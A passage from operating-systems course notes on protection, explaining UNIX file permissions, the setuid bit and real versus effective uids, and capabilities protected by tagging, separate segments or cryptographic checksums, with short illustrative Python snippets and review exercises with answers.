        case READ:    mode &= 4; break;
        case WRITE:   mode &= 2; break;
        case EXECUTE: mode &= 1; break;
    }
    return (mode != 0);
}
When a new file is created, it gets the uid of the process that created it and the gid of the
containing directory. There are system calls to change the uid or gid of a file. For obvious
security reasons, these operations are highly restricted. Some versions of UNIX only allow the
owner of the file to change its gid, only allow him to change it to one of his own gids, and don't
allow him to change the uid at all.
For directories, ``execute'' permission is interpreted as the right to search the directory (that is,
to access the files in it by name). Write permission is required to create or delete files in the
directory. This rule leads to
the surprising result that you might not have permission to modify a file, yet be able to delete it
and replace it with another file of the same name but with different contents!
UNIX has another very clever feature--so clever that it is patented! The file mode actually has a
few more bits that we have not mentioned. One of them is the so-called setuid bit. If a process
executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the
uid of the file. This rather curious rule turns out to be a very powerful feature, allowing the
simple rwx permissions directly supported by UNIX to be used to define arbitrarily complicated
protection policies.
As an example, suppose you wanted to implement a mail system that works by putting all mail
messages into one big file, say /usr/spool/mbox. Each user should be able to read only those
messages that mention him in the To: or Cc: fields of the header. Here's how to use the setuid feature to
implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the
mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has
any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned
by mail and has mode srwxr-xr-x. The `s' means that the setuid bit is set. Any user's process can execute
this program (because the ``execute by anybody'' bit is on), and when it does, it suddenly
changes its uid to mail so that it has complete access to /usr/spool/mbox. At first glance, it would
seem that letting a process pretend to be owned by another user would be a big security hole,
but it isn't, because processes don't have free will. They can only do what the program tells them
to do. While a process is running readmail, it is following instructions written by the designer
of the mail system, so it is safe to let it have access appropriate to the mail system. There's one
more feature that helps readmail do its job. A process really has two uid's, called the effective uid
and the real uid. When a process executes a setuid program, its effective uid changes to the uid
of the program, but its real uid remains unchanged. It is the effective uid that is used to determine
what rights it has to what files, but there is a system call to find out the real uid of the current
process. Readmail can use this system call to find out what user called it, and then only show the
appropriate messages.
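On a UNIX-like system the two identities can be inspected directly; the short Python sketch below is
only illustrative and assumes it is run as an ordinary (non-setuid) process.

import os

# The real uid identifies the user who started the process;
# the effective uid is what the kernel uses for access checks.
real_uid = os.getuid()
effective_uid = os.geteuid()

print("real uid:", real_uid)
print("effective uid:", effective_uid)

# In a setuid program the two differ: the effective uid is the file owner's,
# while the real uid still names the invoking user. A readmail-style program
# would use the real uid to decide which messages to show.
if real_uid == effective_uid:
    print("not running setuid: both ids name the invoking user")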
Capabilities
Capabilities are an alternative to ACLs. A capability is a ``protected pointer'' to an object. It
designates an object and also contains a set of permitted operations on the object. For example,
one capability may permit reading from a particular file, while another allows both reading and
writing. To perform an operation on an object, a process makes a system call, presenting a
capability that points to the object and permits the desired operation. For capabilities to work as a
protection mechanism, the system has to ensure that processes cannot mess with their contents.
There are three distinct ways to ensure the integrity of a capability.
Tagged architecture. Some computers associate a tag bit with each word of memory, marking
the word as a capability word or a data word. The hardware checks that capability words are
only assigned from other capability words. To create or modify a capability, a process has to
make a kernel call.
Separate capability segments. If the hardware does not support tagging individual words, the OS
can protect capabilities by putting them in a separate segment and using the protection features
that control access to segments.
8.3 Cryptography
The third way to protect the integrity of a capability is cryptographic. Each capability can be
extended with a cryptographic checksum that is computed from the rest of the content of the
capability and a secret key. If a process modifies a capability, it cannot fix up the checksum to
match without access to the key. Only the kernel knows the key. Each time a process presents a
capability to the kernel to invoke an operation, the kernel checks the checksum to make sure the
capability hasn't been tampered with.
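A minimal Python sketch of the idea, with the capability format and the kernel's secret key invented
purely for illustration:

import hmac
import hashlib

KERNEL_KEY = b"known only to the kernel"   # illustrative secret

def seal(object_id: str, rights: str) -> tuple:
    """Build a capability: (object, rights, checksum over both under the kernel key)."""
    tag = hmac.new(KERNEL_KEY, f"{object_id}|{rights}".encode(), hashlib.sha256).hexdigest()
    return (object_id, rights, tag)

def verify(capability: tuple) -> bool:
    """Reject any capability whose contents were modified outside the kernel."""
    object_id, rights, tag = capability
    expected = hmac.new(KERNEL_KEY, f"{object_id}|{rights}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)

cap = seal("/tmp/foo", "r")
print(verify(cap))                         # True: untampered
forged = (cap[0], "rw", cap[2])            # a user process tries to add write rights
print(verify(forged))                      # False: checksum no longer matches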
Capabilities, like segments, are a ``good idea'' that somehow seldom seems to be implemented in
real systems in full generality. Like segments, capabilities show up in an abbreviated form in
many systems. For example, the file descriptor for an open file in UNIX is a kind of capability.
When a process tries to open a file for writing, the system checks the file's ACL to see whether
the access is permitted. If it is, the process gets a file descriptor for the open file, which is a sort
of capability to the file that permits write operations. UNIX uses the separate segment approach
to protect the capability. The capability itself is stored in a table in the kernel and the process has
only an indirect reference to it (the index of the slot in the table). File descriptors are not
full-fledged capabilities, however. For example, they cannot be stored in files, because they go away
when the process terminates.
8.4 Exercises
1. What are the main differences between capability lists and access lists?
Answer:
An access list is a list for each object consisting of the domains with a nonempty set of access
rights for that object. A capability list is a list of objects and the operations allowed on those objects for
each domain.
2. What protection problems may arise if a shared stack is used for parameter passing?
Answer:
The contents of the stack could be compromised by other processes sharing the stack.
3. Consider a computing environment where a unique number is associated with each process
and each object in the system. Suppose that we allow a process with number n to access an
object with number m only if n > m. What type of protection structure do we have?
Answer:
We have a hierarchical protection structure.
4. Consider a computing environment where a process is given the privilege of accessing an
object for only n times. Suggest a scheme for implementing this policy.
Answer:
Associate an integer counter with the capability; decrement it on each access and revoke the
capability when the counter reaches zero.
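A minimal sketch of such a counted capability in Python (all names are invented for illustration):

class CountedCapability:
    """Capability that permits at most n uses of an object."""

    def __init__(self, obj, n: int):
        self.obj = obj
        self.remaining = n          # uses left before the capability is revoked

    def use(self):
        if self.remaining <= 0:
            raise PermissionError("capability exhausted")
        self.remaining -= 1         # charge one access
        return self.obj             # hand back the protected object

cap = CountedCapability("/tmp/foo", n=2)
cap.use()
cap.use()
# cap.use()  # a third access would raise PermissionError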
5. Why is it difficult to protect a system in which users are allowed to do their own I/O?
Answer:
In earlier chapters we identified a distinction between kernel and user mode where kernel
mode is used for carrying out privileged operations such as I/O. One reason why I/O must be
performed in kernel mode is that I/O requires accessing the hardware and proper access to
the hardware is necessary for system integrity. If we allow users to perform their own I/O, we
cannot guarantee system integrity.
6. Capability lists are usually kept within the address space of the user. How does the system
ensure that the user cannot modify the contents of the list?
Answer:
A capability list is considered a “protected object” and is accessed only indirectly by the user.
The operating system ensures the user cannot access the capability list directly.
Bibliography
1. Andrew S. Tanenbaum, "Modern Operating Systems", 2nd Edition, Prentice Hall
2. Avi Silberschatz, Peter Baer Galvin & Greg Gagne, "Operating System Concepts", 7th Edition, John Wiley & Sons
3. E. W. Dijkstra, Dijkstra Algorithm, 1965
4. A. N. Habermann, Execution Complexity, 1969
5. Silberschatz & Galvin, "Operating System Concepts", 6th Edition, Addison-Wesley
6. William Stallings, "Operating Systems", 4th Edition, Prentice Hall